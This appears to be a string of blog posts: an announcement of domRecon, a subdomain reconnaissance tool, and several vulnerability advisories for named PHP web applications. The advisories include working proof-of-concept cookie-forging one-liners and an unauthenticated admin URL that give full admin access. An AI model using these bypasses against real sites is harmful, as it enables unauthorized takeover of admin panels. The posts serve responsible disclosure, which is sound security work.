I have decided to port a script I done in C to PHP which I have made available online. I called it domRecon, it basically “hunts” for sub-domains for a domain that you provide.

It works by trying to get lucky by preforming a DNS zone transfer (AXFR) but on most domains this will fail. It will then use a list of about 2000 common sub-domain names and try see if it has a A record lookup on each sub-domain . Once that has finished it will scan 254 IP address (/24) of the networks looking for any more sub-domains.

A normal a complete scan would take about 20secs when checking 2000 sub-domains and scanning about 5 networks. However, large networks will take a lot longer. Status messages are displayed which will update you on the progress of the scan.

You can use the script by going to the following URL:
domrecon.jayscott.co.uk

Star Article is a “Ready to use article, news, joke, tutorial site script with more features than you can think of”. Leads to full administration rights on the CMS admin panel via insecure cookie handling.

Name – admin_user
Content – admin
Path – /

Proof of Concept:

javascript:document.cookie=”admin_user=admin; path=/”

Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.

The full advisory can be found Here.

PHP Site Lock A highly secure website (Ed: haha) login script which has features like User Authentication & Management, Website Password Protection , protection of pdf , images , etc. The Vulnerability leads to full administration rights of the admin panel.

Proof of Concept:

javascript:document.cookie=”user_type=admin; path=/”
javascript:document.cookie=”login_name=admin; path=/”
javascript:document.cookie=”login_id=0; path=/”

Vendor was contacted three times over a 30 day period and didn’t not respond to any of the emails.

The full advisory can be found Here.

Next up is Million Dollar Text Links which is a link exchange application. No authentication checks on the admin home page allows anyone to just browse to the admin contol panel and bypass the login procedure. This will allow full access to the admin panel.

Proof of Concept:

http://sitename[applicationpath]/admin.home.php

Vendor was contacted twice over a 30 day period and didn’t not respond to any of the emails.

The full advisory can be found Here.

I have found a few vulnerability’s in over the last few months which I will be posting here over the next few days. In all cases I have tried to contact the application developer and have included any information regarding in the advisory. Most of them have been cookie related vulnerability’s.

First up is Arcade Trade Script v1.0. Insecure cookie handling allows anyone to simply create a custom cookie with the values below. This will allow full access to the admin panel of the ATS application.

Name – adminLoggedIn
Content – true
Path – /

You can create the cookie by running the following:

javascript:document.cookie =”adminLoggedIn=true; path=/”

The full advisory can be found Here.